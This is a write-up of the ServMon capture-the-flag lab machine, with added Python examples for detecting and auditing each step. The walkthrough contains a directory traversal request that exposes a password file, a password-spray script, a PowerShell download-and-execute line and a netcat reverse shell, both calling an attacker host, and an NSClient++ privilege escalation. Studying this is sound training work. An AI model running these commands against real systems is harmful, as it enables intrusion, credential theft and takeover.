ServMon

Name: ServMon
Release Date: 11 Apr 2020
Retire Date: 20 Jun 2020
OS: Windows
Base Points: Easy - Retired [0]
sampriti 00 days, 03 hours, 08 mins, 02 seconds
sampriti 00 days, 03 hours, 34 mins, 10 seconds
Creator: dmw0ng
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184

 
$ nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 10:02 EDT                                 
Nmap scan report for 10.10.10.184                                                               
Host is up (0.025s latency).                                                                    
Not shown: 65517 closed ports                                                                   
PORT      STATE SERVICE       VERSION                                                           
21/tcp    open  ftp           Microsoft ftpd                                                    
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                          
|_01-18-20  12:05PM                 Users                                                  
| ftp-syst:                                                                                     
|_  SYST: Windows_NT                                                                            
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)                            
| ssh-hostkey:                                                                                  
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)                                  
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)                                 
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)                               
80/tcp    open  http                                                                            
| fingerprint-strings:                                                                          
|   GetRequest, HTTPOptions, RTSPRequest:                                                       
|     HTTP/1.1 200 OK                                                                           
|     Content-type: text/html                                                                   
|     Content-Length: 340                                                                       
|     Connection: close                                                                         
|     AuthInfo:                                                                                 
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  tcpwrapped
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[raw service fingerprints for ports 80 and 8443 omitted]
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m22s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-16T14:08:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.99 seconds

We've got everything open on this one: FTP, SSH, HTTP, RPC, HTTPS on 8443 and a bunch more.  Let's start with FTP.  It looks like anonymous login is allowed, so let's see what goodies are accessible.  There are 2 folders in Users (Nadine and Nathan) with 1 TXT file each.  Get them.

The one on Nadine's folder says:

 

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

And Nathan's says:

 

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

 

That appears to be everything we can get from FTP.  Let's take a look at the HTTP site, which is NVMS-1000, a CCTV/NVR-style surveillance system.  Don't bother trying default credentials; I already tried and failed.  I can't seem to get anything working on HTTP, so let's jump to HTTPS and see if we have better luck.  That appears to be NSClient++ (whatever that is).  Let's searchsploit NVMS and see if something jumps out.

OK.  We have some directory traversal possibilities here.  The 47774.txt (also found here) basically says to intercept the main page's HTTP GET request and change the target.  Time to fire up Burp Suite.  Intercept, send it to Repeater, change the GET line to "/../../../../../../../../../../../../windows/win.ini HTTP/1.1" and fire away.

Vulnerability confirmed.  The Confidential.txt file in Nadine's FTP folder says she put the passwords on Nathan's Desktop, so let's try "GET"ting them.  We change the GET line again, this time to:

 

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1

 

And we get the list of passwords on Nathan's Desktop.
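Seen from the defending side, the request above works because the server glues the URL path onto its web root without normalising it. The following is an added example, not code from the writeup or from NVMS-1000: the flawed resolution pattern beside a hardened one, and the same guard reused as a detector over constructed access-log request lines. The web root path is assumed.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Constructed web root for the example; the real NVMS-1000 install path is not on the page.
WEB_ROOT = "/srv/nvms/www"

def vulnerable_resolve(request_path: str) -> str:
    """The flawed pattern behind the traversal above: the request path is glued onto
    the web root without normalisation, so every '../' walks one level out of it."""
    return WEB_ROOT + request_path

def hardened_resolve(request_path: str) -> Optional[str]:
    """Normalise first, then refuse anything that does not stay under WEB_ROOT.
    Returns the safe absolute path, or None when the request escapes the root."""
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, request_path.lstrip("/")))
    if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/"):
        return None
    return resolved

def is_traversal_attempt(request_line: str) -> bool:
    """Detection: take PATH out of 'METHOD PATH HTTP/x', percent-decode it (so
    %2e%2e%2f is caught too), treat backslashes as separators, and run it through
    the same guard the server should have applied."""
    parts = request_line.split(" ", 2)
    if len(parts) < 2:
        return False
    decoded = unquote(parts[1]).replace("\\", "/")
    return hardened_resolve(decoded) is None

def flag_requests(lines: List[str]) -> List[str]:
    """Return the request lines that try to escape the web root."""
    return [line for line in lines if is_traversal_attempt(line)]

# Constructed access-log request lines modelled on the two GETs in the writeup.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /static/../js/app.js HTTP/1.1",
    "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1",
    "GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1",
    "GET /%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("traversal:", hit)
```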

The list is:

 

1nsp3ctTh3Way2Mars!

Th3r34r3To0M4nyTrait0r5!

B3WithM30r4ga1n5tMe

L1k3B1gBut7s@W0rk

0nly7h3y0unGWi11F0l10w

IfH3s4b0Utg0t0H1sH0me

Gr4etN3w5w17hMySk1Pa5$

 

And we should be able to perform a password spray with these on.....well, everything.  To start, create a users.txt file containing administrator, Nathan, and Nadine.  Create a passwords.txt file with the list above.  It's a little funky, but here's the quick and dirty bash script for it.

 
#!/bin/bash
# Try every password in passwords.txt against every user in users.txt over SMB/RPC.
# A failed logon prints NT_STATUS_LOGON_FAILURE; a success answers "Account Name: ...".
while read -r u; do
    echo "[*] user: $u"
    while read -r p; do
        echo "$u % $p"
        rpcclient -U "$u%$p" -c "getusername;quit" 10.10.10.184
    done < passwords.txt
done < users.txt

RESULT:

$ ./spray.sh 
[*] user: administratoradministrator % 1nsp3ctTh3Way2Mars!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % B3WithM30r4ga1n5tMe
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % L1k3B1gBut7s@W0rk
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % 0nly7h3y0unGWi11F0l10w
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[*] user: NathanNathan % 1nsp3ctTh3Way2Mars!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % B3WithM30r4ga1n5tMe
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % L1k3B1gBut7s@W0rk
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % 0nly7h3y0unGWi11F0l10w
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[*] user: NadineNadine % 1nsp3ctTh3Way2Mars!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % B3WithM30r4ga1n5tMe
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % L1k3B1gBut7s@W0rk
Account Name: Nadine, Authority Name: SERVMON
Nadine % 0nly7h3y0unGWi11F0l10w
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

 

Notice that when it got to Nadine % L1k3B1gBut7s@W0rk it replied Account Name: Nadine, Authority Name: SERVMON.  That's a successful logon: we just got Nadine's credentials.  SSH in with them and we've got ourselves a foothold.  You could also use the ssh_login module in Metasploit (auxiliary/scanner/ssh/ssh_login), but again, MSF makes us lazy!  Moving on.  Looking around on the box (knowing already that NVMS and NSClient++ are installed), I find the NSClient.ini file which, surprise, holds another password: "ew2x6SsGTxjRwXOT".  Unfortunately, it also shows that the service only accepts connections from localhost, which is not very helpful right now.  Let's keep looking.
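The spray above leaves a very recognisable trail on the target: one source address, a burst of failed logons across several accounts, then a single success. This added example (not part of the writeup) builds that event stream as constructed data in the shape of Windows logon events 4625 and 4624 and runs a sliding-window spray detector over it; the thresholds and the source addresses are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Event = Tuple[datetime, int, str, str]  # (time, event id, source ip, account)

def constructed_events() -> List[Event]:
    """Constructed logon events (4625 = failure, 4624 = success) modelled on the spray
    above: one source works through seven passwords for each of three accounts and
    only Nadine's fourth attempt succeeds. The last event is an unrelated normal logon."""
    events, t = [], datetime(2020, 7, 16, 14, 8, 0)
    for user in ("administrator", "Nathan", "Nadine"):
        for attempt in range(7):
            hit = user == "Nadine" and attempt == 3
            events.append((t, 4624 if hit else 4625, "10.10.14.10", user))
            t += timedelta(seconds=1)
    events.append((t + timedelta(minutes=30), 4624, "10.10.14.22", "Nadine"))
    return events

def detect_spray(events: List[Event], window: timedelta = timedelta(minutes=5),
                 min_failures: int = 10, min_accounts: int = 2) -> Dict[str, List[str]]:
    """Flag a source that accumulates min_failures failed logons against at least
    min_accounts distinct accounts inside one sliding window. Returns
    {source: every account that source failed against}."""
    failures: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for t, event_id, src, user in events:
        if event_id == 4625:
            failures[src].append((t, user))
    flagged: Dict[str, List[str]] = {}
    for src, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1  # drop failures that fell out of the window
            recent = fails[start:end + 1]
            if len(recent) >= min_failures and len({u for _, u in recent}) >= min_accounts:
                flagged[src] = sorted({u for _, u in fails})
                break
    return flagged

def successes_from_flagged(events: List[Event],
                           flagged: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """Successful logons from a flagged source: the credential the spray actually found."""
    return [(src, user) for _, event_id, src, user in events
            if event_id == 4624 and src in flagged]
```

A 4624 from a source that has just been flagged is the event worth paging on, since it marks the password that worked rather than the noise of the ones that did not.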

What version of NSClient is running?


nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64


OH! Now we're getting somewhere!  There is a privilege escalation path for NSClient++ version 0.5.2.35, located here.  Obviously we don't want to reboot the system as the exploit states, but we will need to restart the service.  Let's see if we can.  A little Google Fu turns up https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/, which has a nice PowerShell script that will check the service ACL for us.  We just need to get it onto the target, which we do with the Msxml2.XMLHTTP COM object:

 

$ex=New-Object -ComObject Msxml2.XMLHTTP;$ex.open('GET','http://10.10.14.10/ACL-View.ps1',$false);$ex.send();iex $ex.responseText

 

and then running it with

 

Get-Service nscp | fl *

With CanStop set to True, we CAN restart the service.  We need to see that 8443 page, but only localhost can reach it, so let's try an SSH tunnel.

 

ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

 

Then we should be able to log in with the password found in the INI file on the https://localhost:8443 page.

Now we just follow the directions from the ExploitDB page.  I change to the Temp directory and get Netcat over to the box.

Next, create the bat:

 

C:\Temp\nc.exe 10.10.14.10 9999 -e cmd.exe

 

and move it to the target the same way.

 

PS C:\Temp> $WebClient = New-Object System.Net.WebClient
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/nc.exe","C:\Temp\nc.exe")
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/exploited.bat","C:\Temp\exploited.bat")

 

After verifying that Netcat and our malicious bat file are in place, restart the NSCP service.

Now, go to the NSClient++ web page, navigate to Settings > External Scripts > Scripts and hit Add New.

In Section, give it a name (I used shell), in Key put command, and in Value set the path to our Batch file.

Once you add it, the Changes button at the top will change to red.  Select it and hit Save Configuration.

Now that you have it added, restart the NSCP service with:

 

sc.exe stop nscp

sc.exe start nscp

 

Once it has restarted, start a netcat listener (nc -lvnp 9999), sign back into the NSClient Page and go to Console. Under the logs is an input box.  Type in the name of the script you added (in my case shell) and hit Run.  Check your Netcat listener.  Administrator Shell.
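The whole escalation above rests on three NSClient++ settings sitting together: the web UI enabled alongside external scripts, a host filter that only blocks remote clients, and the web password stored in an INI a low-privilege user can read. This added example (not from the writeup or from NSClient++) audits a constructed INI fragment for exactly those conditions; the section and key names follow NSClient++'s INI layout as I know it, the password value is a placeholder, and whether the file is readable by ordinary users is passed in by the caller.

```python
import configparser
from typing import List, Tuple

# Constructed NSClient++ INI fragment modelled on the settings the writeup relies on.
# Section and key names follow NSClient++'s layout; the password value is a placeholder.
SAMPLE_INI = """
[/modules]
CheckExternalScripts = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = example-placeholder-not-a-real-password
"""

def audit_nsclient(ini_text: str, ini_readable_by_users: bool = True) -> List[Tuple[str, str]]:
    """Return (severity, finding) pairs for the conditions the escalation above chains:
    web UI plus external scripts, a loopback-only host filter, and a readable plaintext
    password. ini_readable_by_users is supplied by the caller after checking the file ACL."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep NSClient++ key case (CheckExternalScripts, WEBServer)
    cp.read_string(ini_text)

    def enabled(section: str, key: str) -> bool:
        return cp.get(section, key, fallback="disabled").strip().lower() == "enabled"

    findings: List[Tuple[str, str]] = []
    if enabled("/modules", "WEBServer") and enabled("/modules", "CheckExternalScripts"):
        findings.append(("high", "web UI and external scripts both enabled: whoever holds the "
                                 "web password can register a script and run it as the service account"))
    hosts = cp.get("/settings/default", "allowed hosts", fallback="").strip()
    if hosts in ("127.0.0.1", "localhost", "::1"):
        findings.append(("medium", "allowed hosts is loopback-only: that blocks remote clients, "
                                   "but a local account with an SSH port forward still reaches the web UI"))
    if ini_readable_by_users and cp.has_option("/settings/default", "password"):
        findings.append(("high", "web password stored in plaintext in an INI that "
                                 "low-privilege users can read"))
    return findings

if __name__ == "__main__":
    for severity, text in audit_nsclient(SAMPLE_INI):
        print(f"[{severity}] {text}")
```

Disabling CheckExternalScripts where it is not needed, and restricting the INI's ACL to administrators, removes two of the three links; the loopback filter alone is not a control against a user who already has a shell on the box.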